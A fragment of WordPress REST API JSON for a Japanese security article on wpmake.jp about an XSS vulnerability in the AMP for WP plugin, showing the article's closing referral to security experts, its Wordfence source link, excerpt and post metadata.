href=\"https:\/\/wpmake.jp\/support-lp\/\">\u300cwp.support\u300d<\/a>\u3092\u59cb\u3081\u3068\u3057\u305fWordPress\u306e\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u5bfe\u7b56\u306e\u5c02\u9580\u5bb6\u306b\u76f8\u8ac7\u3057\u307e\u3057\u3087\u3046\u3002<\/p>\n<p>\u53c2\u8003\u5143\uff1a<a href=\"https:\/\/www.wordfence.com\/blog\/2018\/11\/xss-injection-campaign-exploits-wordpress-amp-plugin\/?utm_source=list&#038;utm_medium=email&#038;utm_campaign=112018&#038;_hsenc=p2ANqtz-8BEwYTWAtIMgh5qwhKSmGZg-ATOQGxzCaNEqYAfobfd_8ZI41KbSrOyE8BDmsWt_Vztej0epnaNVF5q40SGNCK5wZJUw&#038;_hsmi=67658946\" rel=\"nofollow noopener\" target=\"_blank\">Wordfence<\/a>\uff08\u5143\u8a18\u4e8b\u306f\u82f1\u8a9e\u3067\u3059\uff09<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u65e5\u672c\u3067\u3082\u5229\u7528\u8005\u304c\u591a\u3044\u300cAMP for WP\u300d\u306bXSS\uff08\u30af\u30ed\u30b9\u30b5\u30a4\u30c8\u30b9\u30af\u30ea\u30d7\u30c6\u30a3\u30f3\u30b0\uff09\u306b\u5bfe\u3059\u308b\u8106\u5f31\u6027\u304c\u767a\u898b\u3055\u308c\u307e\u3057\u305f\u3002 \u5bfe\u5fdc\u65b9\u6cd5\u3068\u539f\u56e0\u3001\u4e3b\u306a\u653b\u6483\u65b9\u6cd5\u306b\u3064\u3044\u3066\u89e3\u8aac\u3057\u307e\u3059\u306e\u3067\u3001\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u4e2d\u306e\u65b9\u306f\u53c2\u8003\u306b\u3057\u3066\u3059\u3050\u306b\u5bfe\u5fdc\u3057\u3066\u304f\u3060\u3055&#8230;<\/p>\n","protected":false},"author":3,"featured_media":1074,"parent":0,"menu_order":0,"template":"","format":"standard","meta":{"_acf_changed":false,"jetpack_post_was_ever_published":false,"footnotes":""},"categories":[],"class_list":["post-1773","security","type-security","status-publish","format-standard","has-post-thumbnail","hentry"],"acf":[],"aioseo_notices":[],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/wpmake.jp\/contents\/wp-json\/wp\/v2\/security\/1773"}],"collection":[{"href":"https:\/\/wpmake.jp\/contents\/wp-json\/wp\/v2\/security"}],"about":[{"href":"https:\/\/wpmake.jp\/contents\/wp-json\/wp\/v2\/types\/security"}],"author":[{"embeddable":true,"href":"https:\/\/wpmake.jp\/contents\/wp-json\/wp\/v2\/users\/3"}],"version-history":[{"count":1,"href":"https:\/\/wpmake.jp\/contents\/wp-json\/wp\/v2\/security\/1773\/revisions"}],"predecessor-version":[{"id":2920,"href":"https:\/\/wpmake.jp\/contents\/wp-json\/wp\/v2\/security\/1773\/revisions\/2920"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/wpmake.jp\/contents\/wp-json\/wp\/v2\/media\/1074"}],"wp:attachment":[{"href":"https:\/\/wpmake.jp\/contents\/wp-json\/wp\/v2\/media?parent=1773"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/wpmake.jp\/contents\/wp-json\/wp\/v2\/categories?post=1773"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}